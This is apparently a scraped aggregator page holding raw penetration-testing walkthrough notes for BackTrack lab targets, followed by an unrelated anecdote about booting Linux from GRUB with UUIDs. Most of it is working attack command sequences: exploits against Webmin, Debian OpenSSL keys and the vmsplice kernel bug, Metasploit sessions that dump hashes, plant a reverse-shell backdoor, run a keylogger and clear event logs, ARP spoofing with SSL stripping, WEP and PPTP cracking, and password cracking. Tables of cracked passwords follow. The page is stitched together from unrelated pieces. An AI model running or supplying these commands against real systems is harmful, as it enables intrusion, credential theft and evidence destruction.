avialiable for the commands,or any websites
267702 items (579 unread) in 27 feeds
Related tags: nbsp [+], quot [+], blip tv [+], heorot [+], video [+], root [+], ice [+], BackTrack [+], wireless cards [+], virtualbox [+], tutorial [+], read [+], linux [+], hxxp [+], don [+], card [+], bt4 [+], bt3 [+], anyone [+], Wireless [+], ziggy marley [+], x protocol [+], wpa wpa2 [+], wpa [+], word list [+], word [+], wlan [+], wiki [+], wep [+], webfilter [+], web filter [+], vulnerability identification [+], vmx [+], vicky devine facing [+], usb enclosure [+], usb [+], una [+], type [+], tmi [+], thc pptp bruter [+], tempo fa [+], tar [+], suceed [+], ssl certs [+], ssh [+], sqlite [+], snapshot [+], sidejacking [+], shared folders [+], server [+], script kiddy [+], router [+], root id [+], rip index [+], reference book [+], priority 1 [+], porta 80 [+], play ground [+], perpose [+], pentest [+], penetration test [+], password [+], omni antenna [+], neighborhood [+], nbsp nbsp nbsp nbsp nbsp [+], mr. oizo [+], list [+], linux os [+], kate [+], iwconfig [+], interval [+], internet [+], instal [+], img [+], iam [+], hydra [+], hi folks [+], help [+], hamster [+], grub [+], google [+], fatal server error [+], extentions [+], ethernet [+], essid [+], error [+], english thanks [+], encrypted files [+], dsl [+], dongle [+], disk [+], dhclient [+], decrypt [+], collaborative debugging tool [+], che [+], chap [+], cd tools [+], cd test [+], cat shadow [+], cat group [+], c drive [+], bypass [+], bruteforce attack [+], bozza [+], boot ini [+], biscotte [+], beta [+], berlin [+], backtrack linux [+], attacker [+], asleap [+], arpspoof [+], airoway [+], airodump [+], aircrack [+], aes [+], access c [+], access [+], Newbie [+]
nmap 192.168.3.1-255
nmap -sV -sS -O 192.168.3.100
firefox http://192.168.3.100
firefox http://192.168.3.100:10000
firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
*Webmin <> save. Filename: shadow
firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
*Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
http://milw0rm.com/exploits/5622 (perl)
http://milw0rm.com/exploits/5720 (python)
http://milw0rm.com/exploits/5632 (ruby)
http://www.exploit-db.com/exploits/5622 (perl)
http://www.exploit-db.com/exploits/5720 (python)
http://www.exploit-db.com/exploits/5632 (ruby)
wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys
tar jxvf debian_ssh_rsa_2048_x86.tar.bz
cd rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
*scans for the public key...*
ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
exit
ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
hostname
uname -a
firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
http://milw0rm.com/exploits/5092 (c)
http://www.exploit-db.com/exploits/5092 (c)
nano vmsplice.c
gcc vmsplice.c -o vmsplice
./vmsplice
whoami
----------------------------------------------------------------------------------------------------
Users
root: root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware: vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama: obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama: osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama: yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
----------------------------------------------------------------------------------------------------
>Setup & run a exploit.What do I need?
>Use nmap to scan.
>Use db_autopwn (to exploit the masses!)
>Gather information about the target
>Read, download and upload files
>Run scripts
>Create & use a backdoor.
cd /pentest/exploits/framework3/
./msfconsole
db_create g0tmi1k
db_hosts
db_add_host 10.0.0.4
db_hosts
#show ##Show everything! [wasn't in video]
use windows/smb/ms06_040_netapi
#use windows/dcerpc/ms03_026_dcom ##Different exploit, didn't find it as reliable
#set paypload windows/shell_bind_tcp ##Could do a windows shell (not as powerful as meterpreter)
#set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)
set payload windows/vncinject/bind_tcp
show options
set lhost 10.0.0.6
show options
exploit
db_del_host 10.0.0.4
db_hosts
db_nmap -n 1O 10.0.0.1-5
db_hosts
db_autopwn -t -p -e
sessions -l
sessoins -i 1
sysinfo
#ipconfig ##IP information [wasn't in video]
idletime
ps
kill [number]
getuid
#migrate // getsystem // use priv ##If the exploit doesn't have system privileges! [wasn't in video]
hashdump
# execute ## Runs a command [wasn't in video]
shell
pwd
ls
cd C:/
ls
mkdir g0tmi1k
ls
cd g0tmi1k
cat C:/boot.ini
download C:/boot.ini /tmp/boot.ini
./msfpayload windows/meterpreter/reverse_tcp lhost=10.0.0.6 X > /tmp/g0tmi1k.exe
upload /tmp/g0tmi1k.exe C:/g0tmi1k/g0tmi1k.exe
run getgui -u g0tmi1k -p haveyou
run keylogrecorder
## More scripts: /pentest/exploits/framework3/scripts/meterpreter
#run scraper ##Gets information about target, dumps reg etc[wasn't in video]
#run vnc ##Setups VNC [wasn't in video]
#run uploadexec ##Upload and run a program [wasn't in video]
clearev
exit -y
exit -y
##Start fresh for the backdoor!
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.6
exploit
## Somehow run: C:\g0tmi1k\g0tmi1k.exe
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.104 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f
/pentest/sniffers/hamster/ferret -i eth0
/pentest/sniffers/hamster/hamster
Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster
airmon-ng stop mon0
airmon-ng start wlan0
airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0
aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0
aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0
aircrack-ng output*.cap
ifconfig wlan0 down
iwconfig wlan0 essid g0tmi1k
iwconfig wlan0 key 59EF19C76A
ifconfig wlan0 up
dhclient wlan0
Notes:echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth1 -t 10.0.0.3 10.0.0.9
arpspoof -i eth1 -t 10.0.0.9 10.0.0.3
wireshark -i eth1 -k
python chap2asleap.py
python chap2asleap.py -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v
cd /pentest/passwords/wordlists.lst
cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999 10.0.0.3
nmap -n 192.168.2.1-255
nmap -n -sV -sS -O 192.168.2.100
nmap -n -sV -sS -O 192.168.2.101
firefox 192.168.2.100
[+]kate -> list of possible usernames. Save. Filename: usernames.txt
firefox 192.168.2.101
[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' infront. -> http://192.168.2.101 -> 80
firefox http://192.168.2.101/~pirrip
[+]kate -> Update usernames with the ones which we got a respond from. Save.
[+]BackTrck -> Web Application Analysis -> Web (frontend) -> nikto2
./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124
firefox http://192.168.2.101/~pirrip/.ssh
// Save both files
mv /root/id_rsa /http://root/.ssh/id_rsa
mv /root/id_rsa.pub /http://root/.ssh/id_rsa.pub
chmod 000 /http://root/.ssh/id_rsa
chmod 000 /http://root/.ssh/id_rsa.pub
ssh pirrip@192.168.2.100
// Yes
mailx
// 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'
cd /etc/
vi passwd
// kate -> Update usernames with only valid ones.
vi group
sudo vi shadow
// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st
su
// Password: 0l1v3rTw1st
cd /root/
ls -a
cd .save/
ls -a
chmod -R 777 /root/
//In BackTrack//
scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/
unzip great_expectations.zip
tar xf great_expectations.tar
strings Jan08
//In SSH//
sudo iv /var/mail/havisham
modprobe capability
//In BackTrack//
ftp 192.168.2.100
// Usrename: pirri. Password: 0l1v3rTw1st //
ls -a
//In SSH//
exit
//In BackTrack//
[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:P1ckw1ckP@p3rs root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:changeme havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:0l1v3rTw1st pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
----------------------------------------------------------------------------------------------------
nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.100
firefox 192.168.1.100
[+]kate -> make list of possible usernames. Save. Filename: usernames
// lastF, fLast
hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s
ssh bbanter@192.168.1.100
// "Yes" if quiz about trusting authenticity. Password: bbanter
cd /etc/
cat passwd
[+]kate -> Update usernames. Save.
cat group
exit
cd /root/tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords
ssh aadams@192.168.1.100
// Password: nostradamus
cd /etc/
sudo cat shadow
// Password: nostradamus
[+]kate -> New -> Paste -> Save. Filename: shadow
exit
john
./john --rules --wordlist=/root/passwords --users=root /root/shadow
// Password: tarot
ssh aadams@192.168.1.100
// Password: nostradamus
su
// Password: tarot
ls -a
cd ..
ls -a
cd ftp
/
ls -a
cd incoming/
ls -a
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
cd /etc/
vi vsftpd.conf
// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)
modprobe capability
exit
exit
ftp 192.168.1.100
// User: root. Password: tarot
ls -a
cd ..
ls -a
cd home
ls -a
cd ftp
ls -a
cd incoming
ls -a
get salary.csv
cd /pentest/passwords/jtr
ls
mv salary.csv ~
[+]kate -> salary.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:tarot = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:nostradamus = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:bbanter = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:hierophant = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
----------------------------------------------------------------------------------------------------
nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.110
firefox 192.168.1.110
[+]kate -> make list of possible usernames
// lastF, fLast
ftp 192.168.1.110
// Username: anonymous. Password: [Blank]
ls -a
cd download
ls -a
cd etc
ls -a
get core
exit
strings core
[+]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is one its own line -> Save. Filename: shadow
cd tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
john
./john --rules --wordlist=/root/passwords /root/shadow
//Password: root:Complexity & ccofee:Diatomaceous
ssh ccofee@192.168.1.110
//Password: Diatomaceous
ls -a
cd ..
ls -a
cd root/
ls -a
cd .save/
su
//Password: Complexity
cd .save/
ls -a
cat copy.sh
openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
ls -a
cat customer_account.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:Complexity = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams: = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:Zymurgy = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
----------------------------------------------------------------------------------------------------
fix-splash800
bash /media/cdrom0/VBoxLinuxAdditions-x86.run
nano /root/.bash_profile
start-network
startx
apt-get -y update
apt-get -y upgrade
apt-get update && apt-get dist-upgrade -y
/pentest/exploits/fast-track.py -i
apt-get install crark
apt-get install wbox
apt-get install vlc
title Main Linux OS
root (hd0,2)
kernel /boot/vmlinuz-2.6.31-17-generic root=/dev/sda3 ro quiet splash
initrd /boot/initrd.img-2.6.31-17-generic
quiet
So I went away on holidays and I hooked my hard disk up to a computer via USB and then booted off it. The Grub menu appeared, and I simply hit Enter to boot into Linux. It booted up fine and everything worked.kernel /boot/vmlinuz-2.6.31-17-generic root=/dev/sda3 ro quiet splash
to:kernel /boot/vmlinuz-2.6.31-17-generic root=/dev/sdb3 ro quiet splash
After I made that change, I pressed B to boot up Linux, and it booted up fine. (I didn't need to change root (hd0,2) to root (hd1,2)).proc /proc proc defaults 0 0
/dev/sda3 / ext3 relatime,errors=remount-ro 0 1
As you can see, my Linux partition was referred to as "/dev/sda3" in my fstab file. Even on the computers where my hard disk was designated as sdb at boot-time, this fstab entry didn't cause any problems (you'd think I would have had to change it to sdb!). Even though my own Linux partition was designated as sdb3 at boot-time, it appears as though it was known as sda3 by the time it came to mounting the root filesystem. (Don't ask me, I haven't got a clue either).title Main Linux OS
uuid 8c5055d5-75e5-5f57-9585-5a5525551524
kernel /boot/vmlinuz-2.6.31-17-generic root=UUID=8c5055d5-75e5-5f57-9585-5a5525551524 ro quiet splash
initrd /boot/initrd.img-2.6.31-17-generic
quiet
And here's my fstab:proc /proc proc defaults 0 0
UUID=8c5055d5-75e5-5f57-9585-5a5525551524 / ext3 relatime,errors=remount-ro 0 1
After I made those changes, it booted every time on every computer. Notice, in these two files, that there's no reference to the hard disk number or even the partition number. You can move this Linux partition around however you like, you can change the partition order on your current hard disk, or you can move the Linux partition to a different hard disk. Your Linux installation should still boot right away without a problem because it's working off the UUID of the partition.sudo blkid | sort
Also, another little cool thing I found is the "/dev/disk" folder. Navigate into that folder and take a look around!